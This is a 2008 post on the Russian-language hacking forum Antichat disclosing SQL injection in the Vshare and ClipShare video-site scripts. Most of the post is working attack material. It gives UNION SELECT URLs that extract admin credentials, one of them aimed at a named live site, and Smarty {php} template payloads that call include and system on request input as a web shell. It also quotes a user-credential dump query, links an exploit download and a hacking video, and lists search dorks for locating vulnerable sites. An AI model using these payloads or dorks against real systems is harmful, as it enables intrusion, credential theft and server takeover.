ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

SQL инъекция в Vshare Youtube Clone и Clipshare
  #1  
Старый 12.02.2008, 13:44
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию SQL инъекция в Vshare Youtube Clone и Clipshare

По сути движок один и тот же, но немного переделанный.

Имя админа
group_posts.php?tid=-1+union+select+1,soption,3,4,svalue,6,7+from+sconf ig+limit+1,1/*&gid=1

Пароль админа
group_posts.php?tid=-1+union+select+1,soption,3,4,svalue,6,7+from+sconf ig+limit+3,1/*&gid=1

Пример: http://www.tios.biz/group_posts.php?tid=-1+union+select+1,soption,3,4,svalue,6,7+from+sconf ig+limit+3,1/*&gid=1

Админка живет в подпапке /siteadmin/

В Clipshare пароль по умолчанию не шифруется, в Vshare пароль в md5.
Замечание: В версиях Clipshare новее 2.6 данные хранятся в файле конфигурации.

Через админ-панель можно редактировать шаблоны страниц, шаблоны обрабатываются классом Smarty, а посему чтобы исполнить код через шаблон необходимо вписать его между тегами {php}{/php}
Например, так:

Код:
{php}if(isset($_REQUEST[i]))include($_REQUEST[i]);{/php}
{php}if(isset($_REQUEST[i]))system($_REQUEST[i]);{/php}
Видео по взлому: http://blacktoad.info/ok/clipshare.rar
P.S. видео немного лагает, но вроде все понятно.

Багу нашел очень давно, выкладывать не хотел, видео изначально планировалось на конкурс видео, но потом все провалилось, т.к. на milworm выложили альтернативную sql инъекцию:

Код:
uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*

И эксплоит смены пароля юзеру

http://milw0rm.com/exploits/download/4837


Дорки:

intext:Copyright © 2006-2007 ClipShare
intext:Copyright © 2008 vShare Youtube Clone

P.P.S форум ставит пробелы...

Последний раз редактировалось Macro; 12.02.2008 в 13:58..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ